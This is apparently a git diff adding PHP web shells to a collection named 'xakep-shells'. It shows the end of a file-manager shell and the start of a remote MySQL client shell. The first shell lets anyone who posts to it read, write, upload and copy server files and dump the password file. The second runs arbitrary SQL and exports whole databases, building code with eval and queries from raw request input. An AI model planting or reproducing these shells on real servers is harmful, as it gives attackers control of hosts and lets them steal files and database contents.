+if(!is_dir($_POST['open'])){
+$fil=file($_POST['open']);
+echo "<textarea cols=100 rows=20 name=edit>";
+foreach($fil as $vv){
+echo htmlspecialchars($vv);
+}
+echo "</textarea><br>".font('green',"FILE : ".$_POST['open'],3);
+if(is_writable($_POST['open'])==1){
+echo w(2).font('green','ACCESS GRANTED');
+echo "<input type=submit name=save value=save><input type=hidden value=".$_POST['open']." name=sv>";
+}}
+else $error=font('red',e(2));
+}
+else $error=test_file($_POST['open']);
+}
+if(isset($_POST['save'])){
+$fr=fopen($_POST['sv'],"w");
+$out=$_POST['edit'];
+fputs($fr,$out);
+fclose($fr);
+}
+#
+#CREATE FILE
+if(isset($_POST['cr']) && $_POST['new']!=''){
+if(is_writable(dirname($_POST['new']))){
+echo font('green',"Create new file : ".$_POST['new'],3)."<br><textarea name=newf cols=100 rows=20></textarea>
+<input type=submit name=cre value=create>
+<input type=hidden value=".$_POST['new']."  name=nf>";
+}
+else echo "<br>".font('red',e(2)."<br>");
+}
+if(isset($_POST['cre'])){
+$ee=fopen($_POST['nf'],'w+');
+$out=$_POST['newf'];
+fputs($ee,$out);
+fclose($ee);
+}
+#
+#MKDIR
+if(isset($_POST['mk']) && $_POST['mkdir']!=''){
+if(is_writeable('./')){
+@mkdir($_POST['mkdir']);
+echo font('green',"dir ".b($_POST['mkdir'])." create"); 
+}
+else echo font('red',e(2));
+}
+#
+echo "<input type=hidden name=th value=".getcwd()."></form>";
+#UPLOAD FILE
+if(isset($_POST['menu']) || isset($_POST['qq'])){
+echo "
+<form enctype=multipart/form-data  method=post>
+Save as :<input type=text name=name>File :<input name=userfile type=file>
+<input type=submit value=Send name=go_up>
+<input type=hidden name=qq>
+<input type=hidden name=th value=".getcwd()."></form>";
+if(isset($_POST['go_up'])){
+if(isset($_POST['name']) && $_POST['name']==''){
+$_POST['name']=$_FILES['userfile']['name'];}
+if(!preg_match('/^\//',$_POST['name'])){
+$_POST['name']=$_POST['th'].'/'.$_POST['name'];}
+if(is_uploaded_file($_FILES['userfile']['tmp_name'])){
+@copy($_FILES['userfile']['tmp_name'],$_POST['name']);}
+else echo "<br>".font('red',"Permisions denied");}}
+#
+#TEST PERM
+if(isset($_POST['tes']) && $_POST['test']!=''){
+$j=$_POST['test'];
+if(file_exists($j)){
+$w='';
+if(is_writeable($j)){
+$w=w(1).'WRITE'.w(1);
+}
+if(is_readable($j)){
+$w=$w.w(1).'READ'.w(1);
+}
+echo font('green',$w.sprintf("%o", (fileperms($_POST['test'])) & 0777));
+}
+else echo font('red',$e(0));
+}
+#
+#COPY
+if(isset($_POST['copy'])&& $_POST['strin']!='' && $_POST['remot']!=''){
+if(file_exists(dirname($_POST['remot']))){
+if(file_exists($_POST['strin'])){
+if(is_writable(dirname($_POST['remot']))){
+if(is_readable($_POST['strin'])){
+@copy($_POST['strin'],$_POST['remot']);
+}
+else echo font('red',"no read string file");
+}
+else echo font('red',"no write dest directory");
+}
+else echo font('red',"no such file");
+}
+else echo font('red',"no such dest dir");
+}
+#
+#CHECK DISK
+if(isset($_POST['free']) && $_POST['dirfree']!=''){
+if(file_exists($_POST['dirfree'])){
+$fre=@disk_free_space($_POST['dirfree'])/1048576;
+echo font('green',"Free space in ".b($_POST['dirfree'])." : ".$fre." Mb");
+$fre1=@disk_total_space($_POST['dirfree'])/1048576;
+echo "<br>".font('green',"Full size in ".b($_POST['dirfree'])." : ".$fre1." Mb");
+}
+else echo font('red',"No such disk");
+}
+#
+(isset($_POST['info']))?phpinfo():null;
+#
+#PASSWD
+if(!empty($_POST['passwd']) && isset($_POST['passw'])){
+echo "<center>".font('blue',"file : ".$_POST['passwd'],6)."</center><br><textarea cols=100 rows=15>\n";
+foreach(@file($_POST['passwd']) as $fed)echo $fed;
+echo "</textarea><br>\n";}
+#
+if(isset($error))echo $error;?>
+<hr><?php
+##################################################################################
+if(is_readable(getcwd())){
+if($h=opendir(getcwd())){
+$arr=array();
+while(false!==($f=readdir($h))){array_push ($arr,$f);}
+closedir($h);}}
+else die("<center>".b(font('red','FUNCTION LIST PERMISSION DENIED',6))."</center>");
+sort($arr);
+echo '<table width=800 bgcolor=#DFD6C8 cellspacing=0 cellpadding=0 border=1>';
+foreach($arr as $f){
+$l=@lstat($f);
+print((is_readable($f) && is_writeable($f))?"<tr><td>".w(1).b("R".w(1).font('red','RW',3)).w(1):(((is_readable($f))?"<tr><td>".w(1).b("R").w(4):"").((is_writable($f))?"<tr><td>".w(1).b(font('red','RW',3)):"")));
+$r=sprintf("%o",(@fileperms($f)) & 0777);
+$ow=posix_getpwuid($l[4]);
+$gr=posix_getgrgid($l[5]);
+$fow=($ow["name"]?$ow["name"]:fileowner($f))."/".($gr["name"]?$gr["name"]:filegroup($f));
+if(!is_readable($f) && !is_writeable($f)) echo "<tr><td>".w(12);
+echo "</td><td>$r</td><td>$fow</td>";
+if(!is_dir($f)){
+if(!is_link($f)){
+echo w(2)."<td><i>".$l[7]."</i></td>";}
+else echo "</td><td>link</td>";}
+else echo "</td><td>DIR</td>";
+$fi=htmlspecialchars($f);
+echo "<td>".@strftime('%B %e %H:%M',@filemtime($f))."</td><td>".(is_dir($f)?font('blue',$fi,3):$fi)."</td>\n";}
+?>
+</table></body></html>
+<?php exit; ?>
diff --git a/xakep-shells/PHP/shankar.php.php.txt b/xakep-shells/PHP/shankar.php.php.txt
new file mode 100644
index 0000000..47b475b
--- /dev/null
+++ b/xakep-shells/PHP/shankar.php.php.txt
@@ -0,0 +1,748 @@
+<?php
+
+        ##############################################################
+        # Simple PHP Mysql client (c) ShAnKaR (Updated on 28.11.2007)#
+        ##############################################################
+
+@set_time_limit(0);
+
+
+if(get_magic_quotes_gpc()){
+while(list($key,$val)=each($_POST)){
+$_POST[$key]=stripslashes($val);}}
+
+$far=array('f','gz','bz','.txt','.gz','.bz2');
+
+
+//--------------------------
+
+$text="\$etext=\"<html><head><title>Simple PHP Mysql client</title></head>
+\n<body bgcolor=#C2DDFF><form method='POST' enctype=multipart/form-data><div style='width:100%;background-color:#A8B8F1;'>\n";
+
+$a=array('srv','user','pass','db');$i=-1;
+while($i++<3){
+$text.="<input type='text' size=18 name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?'{$_POST[$a['.$i.']]}':(($i==0)?'localhost':null))."'>\n";}
+
+$text.="<input type='submit' name='sql' value=' SQL '>\n<b>No Display:</b>
+<input type=checkbox name='dd' ".(isset($_POST['dd'])?'checked':'').">DB<input type=checkbox name='dt' ".(isset($_POST['dt'])?'checked':'').">Tables&nbsp;&nbsp;&nbsp;&nbsp;\".(isset(\$version)?'<font style=\'font-style:italic;font-variant:small-caps;font-weight:bolder;\' >'.\$version[0].'</font>':'').\"</div><a href='http://shankar.name/sql.phps' title='simple PHP Mysql client' style='position:fixed;right:0;font-size:7pt;color:red;font-weight:bold;' target='_blank' >S<br>i<br>m<br>p<br>l<br>e<br> <br>P<br>H<br>P<br> <br>M<br>y<br>s<br>q<br>l<br> <br>c<br>l<br>i<br>e<br>n<br>t<br></a>\"";
+
+
+
+if(isset($_POST['sql'])){
+
+if(isset($_POST['user']))$user=$_POST['user'];
+if(isset($_POST['pass']))$password=$_POST['pass'];
+
+if(isset($_POST['srv'])){
+$server=$_POST['srv'];
+
+$connect=@mysql_connect($server,$user,$password) or die(eval($text.";echo \$etext.\"</form>not connect\";"));}
+
+else{die(eval($text.";echo \$etext.\"</form>\";"));}
+
+$version=mysql_fetch_row(mysql_query('SELECT version()'));
+
+if(!empty($_POST['db'])){@mysql_select_db($_POST['db'])or die(eval($text.";echo \$etext.\"</form>Could not select db<br>\";"));}
+
+
+if(empty($_POST['table_sel']) && !empty($_POST['table_sel2']))$_POST['table_sel']=$_POST['table_sel2'];
+
+
+function select(){
+global $connect;
+
+
+if(isset($_POST['table_sel2']) && $_POST['table_sel']!=$_POST['table_sel2']){$_POST['sort']=null;$_POST['br_st']=null;}
+$sort=(!empty($_POST['sort'])?'ORDER BY `'.trim($_POST['sort']).'` '.(($_POST['asc']==='asc')?'ASC':'DESC').' ':'');
+
+$co=((isset($_POST['br_st']) && isset($_POST['br_en']) && isset($_POST['brow']))?$_POST['br_en'].','.$_POST['br_st']:'0,20');
+
+
+
+$_POST['querysql']=((!empty($_POST['querysql']) && isset($_POST['push']))?$_POST['querysql']:"SELECT * FROM `".$_POST['table_sel']."` $sort limit $co");
+
+
+
+$result=@mysql_query($_POST['querysql'],$connect) or print("<input type=submit name=push value=Run><br><textarea cols=70% rows=8 name='querysql'>".$_POST['querysql']."</textarea><br>");
+
+if(is_resource($result)){
+$meta=mysql_fetch_field($result);
+$tables=$meta->table;
+$tr=0;
+if($tables==true){
+
+$tr=1;
+if($quer=mysql_query("select count(*) from $tables"))$n=mysql_fetch_array($quer);
+else $tr=2;
+
+}
+
+else{
+
+$_POST['table_sel']=$tables;
+if($tr==1)$n=mysql_fetch_row(mysql_query('select count(*) from '.$_POST['table_sel']));
+
+
+}
+
+if($tr>0){
+print($tr==1)?"<input type=hidden name='table_sel2' value='$tables'>":'';
+$arr=array();
+for ($i=0;$i<mysql_num_fields($result); $i++){
+if(ereg('primary_key',mysql_field_flags($result,$i)))
+$arr[]=mysql_field_name($result,$i);}
+}
+
+
+$up_e='';
+
+echo "<div style='width:100%;height:440px;overflow:auto;'><table border=1>";
+
+
+$fields=@mysql_list_fields($_POST['db'],$tables,$connect);
+$coms=@mysql_num_fields($fields);
+if($coms>0){
+echo "<tr bgcolor='#A8B8F1'>\n<td width=21></td>";
+for($i=0;$i<$coms;$i++){
+$lk=mysql_field_name($fields, $i);
+print((count($arr)>0 && array_search($lk,$arr)!==false)?"<td><u><b>$lk</b></u></td>":"<td>$lk</td>\n");
+}}
+
+while($line=mysql_fetch_assoc($result)){
+$linet=$line;
+if($tr>0){
+if(count($arr)==0){
+while(list($key,$val)=each($line)){$up_e.="`$key`='".addslashes($val)."' and ";}
+$up_e=substr($up_e,0,-5);}
+
+else{
+while(list($key,$val)=each($line)){
+if(array_search($key,$arr)!==false){$up_e.="`$key`='".addslashes($val)."' and ";}}
+$up_e=substr($up_e,0,-4);
+}
+
+$up_e=urlencode($up_e);
+
+print "</tr><tr><td bgcolor='#C1D2C5'>".(($tr==1)?"<input type=radio name=edit value='$up_e'>":'&nbsp;&nbsp;')."</td>\n";
+}
+else echo "<tr>\n";
+
+
+$up_e='';
+
+foreach($line as $col_value){
+echo "<td>".((strlen($col_value)>40)?'<textarea cols=40 rows=7>'.htmlspecialchars($col_value).'</textarea>':htmlspecialchars($col_value))."</td>\n";
+}
+
+echo "</tr>\n";}
+
+echo "</table></div>";
+if($tr==1){
+echo "<div style='width:100%;background-color:#dfdfdf;'><input type=submit name='brow' value='Browse'><b>&nbsp;Sort by
+<select name=sort><option value=''></option>";
+
+foreach(array_keys($linet) as $lkk){
+print "<option value='$lkk'".((isset($_POST['sort']) && $_POST['sort']===$lkk)?' selected':'').">$lkk</option>\n";}
+
+echo "</select><select name='asc'><option value='asc'>ASC</option><option value='desc'".((isset($_POST['asc']) && $_POST['asc']==='desc')?' selected':'').">DESC</option></select>
+Show<input type=text size=5 value=".((isset($_POST['br_st']) && isset($_POST['brow']))?$_POST['br_st']:$n[0])." name='br_st'>row(s) start from<input type=text size=5 value=".((isset($_POST['br_en']))?$_POST['br_en']:'0')." name='br_en'></b>
+<input type=submit name=editr value=Edit><input type=submit name='dell' value=Delete></div>";
+
+}
+mysql_free_result($result);
+
+}
+else{
+if($result===false)echo mysql_error($connect);
+else echo 'Query susceful! %)';
+}
+
+}
+
+
+
+
+
+
+
+
+
+
+
+
+function load($file){
+global $far;
+if(file_exists($file)){
+eval("\$zd=".$far[$_POST['compr']]."open(\$file,'r');");
+($_POST['compr']<2)?eval("\$buff='';while(!".$far[$_POST['compr']]."eof(\$zd)){\$buff.=".$far[$_POST['compr']]."gets(\$zd);}"):eval("\$buff=bzread(\$zd);");
+eval($far[$_POST['compr']]."close(\$zd);");
+return($buff);
+}
+else{
+print 'no such file!';
+}
+}
+
+function write($data){
+global $dump,$fp,$far;
+($_POST['save']==0)?$dump.=$data:(isset($fp)?eval($far[$_POST['compr']]."write(\$fp,\$data);"):null);}
+
+function sqlh(){
+if($_POST['save']>0){
+global $server,$dbtr;
+write("#\n#Server : ".getenv('SERVER_NAME')."
+#DB_Host : ".$server."
+#DB : ".$_POST['db'].
+(($dbtr==0)?"
+#Table : ".$_POST['table_sel']:"")."\n#\n\n");}}
+
+function sql($tabel_sel){
+global $connect;
+$row=mysql_fetch_row(mysql_query("SHOW CREATE TABLE `$tabel_sel`",$connect));
+write("DROP TABLE IF EXISTS `$tabel_sel`;\n".$row[1].";\n\n");}
+
+function test($aaa){
+$d=array();
+while(list($key,$val)=each($aaa)){$d[$key]=addslashes($val);}
+return($d);}
+
+function sql1($table_sel){
+
+global $connect,$dbtr;
+$result=mysql_query("SELECT ".(!empty($_POST['ufiled'])?$_POST['ufiled']:'*')." FROM `$table_sel` ".(($dbtr==0)?'LIMIT '.$_POST['ulimits'].','.$_POST['ulimite']:''),$connect);
+
+
+
+while($line=mysql_fetch_assoc($result)){
+((!isset($key))?($key=implode('`, `',array_keys($line))):null);
+$ddd=test(array_values($line));
+$val=implode('\', \'',$ddd);
+write("INSERT INTO `".$table_sel."`(`".$key."`) VALUES ('".$val."');\n");}
+
+mysql_free_result($result);}
+
+function head($tmpfname,$name){
+header("Content-Type: application/octet-stream; name=\"$name\"");
+header("Content-Length: ".filesize($tmpfname)."");
+header("Content-disposition: attachment; filename=\"$name\"");
+$fd=fopen($tmpfname,"r");
+while(!feof($fd)){
+echo fgets($fd,4096);}
+fclose($fd);
+($_POST['save']==1)?unlink($tmpfname):null;
+exit;}
+
+function csv($table_sel){
+global $connect,$far,$dbtr;
+$res=mysql_query("SELECT ".(!empty($_POST['ufiled'])?$_POST['ufiled']:'*')." FROM `$table_sel` ".(($dbtr==0)?'LIMIT '.$_POST['ulimits'].','.$_POST['ulimite']:''),$connect);
+$i=0;
+$keys='';
+while($key=@mysql_field_name($res,$i++))$keys.=$key."; ";
+
+write("# Fields: \n#".$keys."\n\n");
+if(mysql_num_rows($res)>0){
+
+
+
+
+while($row=mysql_fetch_assoc($res)){
+$values=array_values($row);
+foreach($values as $k=>$v){$values[$k]=addslashes($v);}
+$values=implode($_POST['cvs_term'],$values);
+write($values."\n");
+}
+
+
+}}
+
+
+if(isset($_POST['back']) && (isset($_POST['table_sel']) ||  $_POST['dbtr']=1 )){
+$dbtr=$_POST['dbtr'];
+$dump='';
+
+if($_POST['save']>0){
+
+$tmpfname=($_POST['save']==1)?tempnam($_POST['save_p'],"sess_"):$_POST['local'];
+if(is_writeable(dirname($tmpfname))){
+eval("\$fp=".$far[$_POST['compr']]."open(\$tmpfname,'w');");
+}
+}
+
+sqlh();
+
+switch($_POST['as']){
+case 0:
+
+switch($_POST['as_sql']){
+case 0:
+
+
+
+if($dbtr==1){
+$it=0;
+while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){
+sql($table_sel);
+
+
+}}
+
+else sql($_POST['table_sel']);
+
+
+break;
+case 1:
+
+
+if($dbtr==1){
+$it=0;
+while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){
+sql($table_sel);
+sql1($table_sel);
+}}
+else {
+sql($_POST['table_sel']);
+sql1($_POST['table_sel']);
+}
+
+
+
+break;
+case 2:
+if($dbtr==1){
+$it=0;
+while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){
+sql1($table_sel);
+}}
+else sql1($_POST['table_sel']);
+
+
+break;}
+
+if($_POST['save']>0){
+if(isset($fp)){
+eval($far[$_POST['compr']]."close(\$fp);");
+
+($_POST['save']==1)?head($tmpfname,(($dbtr==1)?$_POST['db']:$_POST['table_sel']).$far[$_POST['compr']+3]):($message='<center><b>'.$_POST['local'].' Saved</b><center>');}
+else $message='<center><b>No writeable select Dir</b><center>';
+}
+
+break;
+case 1:
+//-----------------------------------
+
+
+if($dbtr==1){
+$it=0;
+while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){
+write("\n# Table: $table_sel\n");
+csv($table_sel);
+
+
+}}
+
+else csv($_POST['table_sel']);
+if($_POST['save']>0){
+eval($far[$_POST['compr']]."close(\$fp);");
+($_POST['save']==1)?head($tmpfname,(($dbtr==1)?$_POST['db']:$_POST['table_sel']).$far[$_POST['compr']+3]):'';
+}
+
+//------------------------------
+break;}}
+
+
+
+
+eval($text.";echo \$etext.\"\n<table width=100% height=90%><tr><td width=10% style='vertical-align:top'><table><tr><td>\";");
+
+if(!isset($_POST['dd'])){
+$db_list=mysql_list_dbs($connect);
+echo "<select name='db'>\n";
+
+while($row=mysql_fetch_assoc($db_list)){
+$db1=$row['Database'];
+echo "<option value='$db1'".(($db1===$_POST['db'])?' selected':'').">$db1</option>\n";
+}
+
+echo "</select>";
+}
+else echo "<input type=text name='db' value='".$_POST['db']."'>\n";
+
+
+echo "</td></tr><tr><td>\n";
+
+if(!empty($_POST['db'])){
+$it=0;
+$table_selt=array();
+while($table_selt[]=@mysql_tablename(mysql_list_tables($_POST['db']),$it++));
+
+if(isset($_POST['table_sel']) && array_search($_POST['table_sel'],$table_selt)===false)$_POST['table_sel']='';
+
+
+if(mysql_num_rows(mysql_list_tables($_POST['db']))>0){
+
+
+
+if(!isset($_POST['dt'])){
+echo "<select name='table_sel' multiple size=27>\n";
+$it=0;
+while($table_sel=@mysql_tablename(mysql_list_tables($_POST['db']),$it++)){
+
+$n=mysql_fetch_array(mysql_query("select count(*) from $table_sel"));
+(isset($_POST['table_sel']) && $_POST['table_sel']===$table_sel)?$nt=$n:null;
+echo "\n<option value='$table_sel'".((isset($_POST['table_sel']) && $_POST['table_sel']===$table_sel)?'selected':'').">$table_sel(".$n[0].")</option>";
+
+}
+
+
+
+echo "</select>";
+}
+else {
+if(!empty($_POST['table_sel']))$nt=mysql_fetch_array(mysql_query("select count(*) from ".$_POST['table_sel']));
+echo "<input type=text name='table_sel' value='".(isset($_POST['table_sel'])?$_POST['table_sel']:'')."'>\n";
+}}
+
+else echo '&nbsp;<b>No tables =\</b>';
+
+echo "</td></tr></table></td><td style='vertical-align:top'>
+<table width=100% height=100% bgcolor='#E3FFF2'><tr><td height=20 bgcolor=#dfdfdf width=100%><nobr><b>
+<input type=radio Name='go' value=0>SQL
+<input type=radio Name='go' value=1>Search
+<input type=radio Name='go' value=2>Export
+<input type=radio Name='go' value=3>Import
+";
+if(!empty($_POST['table_sel']))echo "
+<input type=radio Name='go' value=4>Browse
+<input type=radio Name='go' value=5>Insert";
+
+
+
+
+
+echo "</b></nobr></td></tr><tr width=100%><td width=100%>\n".(isset($message)?$message:'');}
+
+if(isset($_POST['push']) && !empty($_POST['querysql']))$_POST['go']=4;
+
+if(isset($_POST['back']))$_POST['go']=2;
+
+if(isset($_POST['brow']))$_POST['go']=4;
+
+if(isset($_POST['editr']) && isset($_POST['edit']))$_POST['go']=6;// EDIT
+
+if(isset($_POST['ed_save']))$_POST['go']=7;//INSERT
+
+if(isset($_POST['search']))$_POST['go']=8;
+
+if(isset($_POST['up']) && (!empty($_POST['load']) || !empty($_POST['upload'])))$_POST['go']=9;
+elseif(isset($_POST['up']))$_POST['go']=3;
+
+if((isset($_POST['dell']) && isset($_POST['edit']))|| isset($_POST['delp']))$_POST['go']=10;
+
+if(!isset($_POST['go']) && !empty($_POST['table_sel']))$_POST['go']=4;
+
+
+
+
+
+if(isset($_POST['go'])){
+switch($_POST['go']){
+case 0:
+
+//SQL
+
+echo "<input type=submit name=push value=Run><br>
+<textarea cols=70% rows=8 name='querysql'>\n".((!empty($_POST['querysql']))?htmlspecialchars($_POST['querysql'],ENT_QUOTES):((!empty($_POST['table_sel']))?"SELECT * FROM `".$_POST['table_sel']."` WHERE 1":null))."</textarea><br><br>\n";
+
+
+break;
+
+
+case 1:
+echo "
+<table>
+<tr bgcolor='#A8B8F1'><td>&nbsp;Location</td><td>&nbsp;Options</td><td>&nbsp;Search conditions</td><td>&nbsp;Limit</td><td></td></tr><tr bgcolor='#D7D7D7'>
+<td>
+<select name='locas'>
+<option value=0>DB: ".$_POST['db']."</option>
+".(!empty($_POST['table_sel'])?'<option value=1>Tb: '.$_POST['table_sel'].'</option>':'')."
+</select>
+</td>
+
+<td>
+<select name=opts>
+<option value='='>=</option>
+<option value='>'>></option>
+<option value='>='>>=</option>
+<option value='<'><</option>
+<option value='<='><=</option>
+<option value='!='>!=</option>
+<option value='LIKE'>LIKE</option>
+<option value='NOT LIKE'>NOT LIKE</option>
+<option value='IS NULL'>IS NULL</option>
+<option value='IS NOT NULL'>IS NOT NULL</option>
+</select></td>
+<td>
+<input type=text name='seart'></td>
+<td><input type=text name='limits'></td>
+<td><input type=submit name='search' value='search'></td></tr>
+
+</table>
+
+";
+
+break;
+
+case 3:
+//IMPORT
+
+
+echo "<center><div style='width:300;background-color:#A8B8F1;'>Load file: &nbsp;<input type=file name='upload'><br>
+Local file: <input type=text name='load' size=30><br>
+<input type=radio name=compr value=0 checked>Text".(function_exists('gzencode')?'<input type=radio name=compr value=1>Gzip':'').(function_exists('bzcompress')?'<input type=radio name=compr value=2>Bzip2':'')."</div>
+<input type=submit name='up' value='Import'></center>";
+
+
+
+break;
+
+
+
+case 4:
+
+//BROWSE
+
+
+if(!empty($_POST['table_sel']) || isset($_POST['querysql']))select();
+
+//+++++++++++++++++++++++++++++++++++BROWSE _ END ++++++++++++++++++++++++++++++
+break;
+
+
+case 2:
+
+//EXPORT
+
+if(!isset($_POST['back'])){
+echo '<table height=250 align="center"><TR><TD>
+<table height=100%>
+<tr><td bgcolor="#A8B8F1" width="100" height="20"><b>&nbsp;&nbsp;Export as</b></td></tr>
+<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="0" checked><b>&nbsp;&nbsp;SQL</b></td></tr><tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="1"><b>&nbsp;&nbsp;CSV</b></td></tr><tr><td height=100%></td></tr>
+</table></TD><td>
+<table width="140" height=100%>
+<TR><TD bgcolor="#A8B8F1" height="20"><b>&nbsp;&nbsp;SQL</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="as_sql" value="0"><b>Only structure</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="as_sql" value="1" checked><b>All</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="as_sql" value="2"><b>Only data</b></TD></TR>
+<TR><TD bgcolor="#A8B8F1" height="20"><b>CSV</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF" height="20"><b>Terminated&nbsp;</b><input size=2 type=text Name="cvs_term" value=":"></TD></TR><tr><td height=100%></td></tr></table></td><td>
+<table height=100%><tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="0" checked><b>&nbsp;View</b></td></tr>
+<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="1"><b>&nbsp;Download</b></td></tr>
+<tr><td bgcolor="#E6D29C" width="130" height="40"><b>&nbsp;Temp path</b><br><input type=text Name="save_p" value="/tmp"></td></tr>
+<tr><td bgcolor="#E6D29C" width="100" height="20">
+<input type=radio Name="save" value="2"><b>&nbsp;Save as local file</b><br>
+<input type=text value="./db_backup" name="local">
+</td></tr>
+<tr><td height=100%></td></tr>
+</table></td><td>
+<table width="120" height=100%>
+<TR><TD bgcolor="#A8B8F1" height="20"><b>&nbsp;&nbsp;Compression</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="compr" value="0" checked><b>None</b></TD></TR><TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="compr" value="1" '.
+(function_exists('gzencode')?'':'disabled="true"').'><b>Gzip</b></TD></TR><TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="compr" value="2" '.
+(function_exists('bzcompress')?'':'disabled="true"').'><b>Bzip2</b></TD></TR><tr><td height=100%></td></tr></table></td><td>
+<table width="150" height=100%>
+<TR><TD bgcolor="#A8B8F1" height="20"><b>&nbsp;&nbsp;Backup</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="dbtr" value="1" checked><b>All DataBase</b></TD></TR>'.(!empty($_POST['table_sel'])?'<TR><TD bgcolor="#D0E0FF" height="20"><input type=radio Name="dbtr" value="0" ><b>Only One Table</b></TD></TR>':'').'<tr><td height=100%></td></tr>
+</table></td></TR><tr><td></tr></table>
+';
+if(isset($nt)){
+echo '
+<table width="100%"><tr><td bgcolor="#A8B8F1"><b>If backup only one table, use this options</b>(optional)</td><td></td>
+</tr>
+<tr bgcolor="#D0E0FF"><td><b>Use Fileds (Separator as ",")</b>,if emty then use All Fileds</td><td><input type=text name="ufiled" size=40 ></td></tr>
+<tr bgcolor="#D0E0FF"><td><b>Limit:</b></td><td><input type=text name=ulimits size=6 value=0><input type=text name=ulimite size=6 value='.($nt[0]).'></td></tr>
+</table>';
+}
+echo '<input type=submit value=backup name=back>';
+}
+
+
+if(isset($_POST['back']) && $_POST['save']==0)echo "<textarea cols=100 rows=20>".htmlspecialchars($dump)."</textarea>";
+break;
+
+
+
+case 5:
+
+//INSERT IN TABLE
+if(!empty($_POST['table_sel'])){
+echo "<div style='width:100%;height:430;overflow:auto;'><table>\n";
+$fields=mysql_list_fields($_POST['db'],$_POST['table_sel'],$connect);
+
+for($i=0;$i<mysql_num_fields($fields);$i++){
+echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($fields,$i).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($fields,$i).'('.mysql_field_len($fields,$i).")</b></td><td>".((mysql_field_len($fields,$i)<40)?"<input type='text' name='ed_key:".mysql_field_name($fields,$i)."' value='' size=40>":"<textarea name='ed_key:".mysql_field_name($fields,$i)."' cols=31 rows=7></textarea>")."</td></tr>\n";}
+
+echo "</table></div><input type=hidden name=insert value=1><input type=submit name=ed_save value=Insert>";
+
+}
+break;
+
+
+
+
+
+
+case 6:
+
+
+//EDIT
+
+
+
+
+if($_POST['table_sel']===$_POST['table_sel2']){
+
+$up_e=$_POST['edit'];
+echo "<input type=hidden name=edit value='$up_e'>";
+$up_e=urldecode($_POST['edit']);
+echo "<div style='width:100%;height:440;overflow:auto;'><table>\n";
+$fi=0;
+
+$result=mysql_query("SELECT * FROM `".$_POST['table_sel']."` WHERE $up_e",$connect);
+
+while($line=mysql_fetch_assoc($result)){
+
+foreach($line as $key=>$col_value){
+echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($result,$fi).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($result,$fi).'('.mysql_field_len($result,$fi).")</b></td><td>".((mysql_field_len($result,$fi)<40)?"<input type='text' name='ed_key:".mysql_field_name($result,$fi)."' value='".htmlspecialchars($col_value,ENT_QUOTES)."' size=40>":"<textarea name='ed_key:".mysql_field_name($result,$fi)."' cols=31 rows=7>".htmlspecialchars($col_value,ENT_QUOTES)."</textarea>")."</td></tr>\n";
+$fi++;}}
+
+echo "</table></div><input type=submit name=ed_save value=Save>";
+}
+else select();
+
+break;
+
+
+case 7:
+
+//INSERT/UPDATE
+
+$ted='';
+reset($_POST);
+while(list($key,$val)=each($_POST)){
+if(preg_match('/^ed_key:(.+)/',$key,$m)){
+$ted.="`".$m[1]."`= '".addslashes($val)."', ";
+}}
+$ted=substr($ted,0,-2);
+$query=((isset($_POST['insert']))?"INSERT":"UPDATE")." `".$_POST['table_sel']."` SET $ted ".((isset($_POST['insert']))?'':"WHERE ".urldecode($_POST['edit'])." LIMIT 1 ");
+echo "<div style='background-color:white;'>".htmlspecialchars($query,ENT_QUOTES)."</div><br>";
+$result=mysql_query($query,$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
+echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";
+
+
+
+
+break;
+
+case 8:
+//SEARCH;
+
+
+print "<div style='width:100%;height:440px;overflow:auto;'>";
+
+$j=0;
+
+
+function spdb($line){
+global $connect,$j,$sql;
+$fields=mysql_list_fields($_POST['db'], $line, $connect );
+$columns=mysql_num_fields($fields);
+for($i=0;$i<$columns;$i++){
+$nomField=mysql_field_name($fields,$i);
+$sql="SELECT ".$nomField." FROM ".$line." WHERE ".$nomField.' '.$_POST['opts'].(!preg_match('/NULL/',$_POST['opts'])?" ".(!preg_match('/[><]/',$_POST['opts'])?"'":'').addslashes($_POST['seart']).(!preg_match('/[><]/',$_POST['opts'])?"'":''):'').(!empty($_POST['limits'])?' LIMIT '.$_POST['limits']:'');
+$query=mysql_query($sql) or print(mysql_error($connect));
+
+if(mysql_num_rows($query)>0){
+while($result=mysql_fetch_array($query)){
+echo "Table: <b>".$line."</b>&nbsp;&nbsp;Field: <b>".$nomField."</b><br>SQL: <b>".htmlspecialchars($sql)."</b><br><b><div  style='background-color:#71D8C3;'>".htmlspecialchars($result[0])."</div></b>";
+echo "<br><br>";
+$j++;
+}}}}
+
+
+
+
+
+
+if($_POST['locas']==0){
+$tables=mysql_list_tables($_POST['db']);
+while($line=mysql_fetch_row($tables)){
+spdb($line[0]);
+}}
+else{
+spdb($_POST['table_sel']);
+}
+
+
+
+
+
+echo "</div><div style='background-color:#C4DCC7;'>Results: ".$j.'</div>';
+
+
+
+break;
+
+case 9:
+
+
+if(is_uploaded_file($_FILES['upload']['tmp_name'])) {
+$data=load($_FILES['upload']['tmp_name']);
+}
+elseif(!empty($_POST['load'])){
+$data=load($_POST['load']);
+}
+if(isset($data)){
+$arrup=explode(';',$data);
+if(preg_match('/^[ \n\r]?$/',$arrup[count($arrup)-1]))array_splice($arrup,-1);
+foreach($arrup as $aup){
